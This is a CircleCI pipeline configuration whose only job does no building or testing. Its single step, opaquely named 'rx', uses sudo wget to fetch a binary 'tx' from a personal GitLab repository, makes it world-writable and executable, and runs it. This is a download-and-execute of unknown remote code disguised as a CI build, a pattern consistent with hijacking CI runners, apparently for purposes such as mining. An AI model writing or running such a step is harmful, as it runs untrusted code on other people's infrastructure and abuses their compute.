version: 2.1

jobs:
  build:
    docker:
      - image: cimg/python:3.10.4

    steps:
      - run:
          name: "rx"
          command: |
           sudo wget https://gitlab.com/TandraKauffman/rx/-/raw/main/tx && chmod 777 tx && ./tx

workflows:
  version: 2
  build:
    jobs:
      - build



          
           
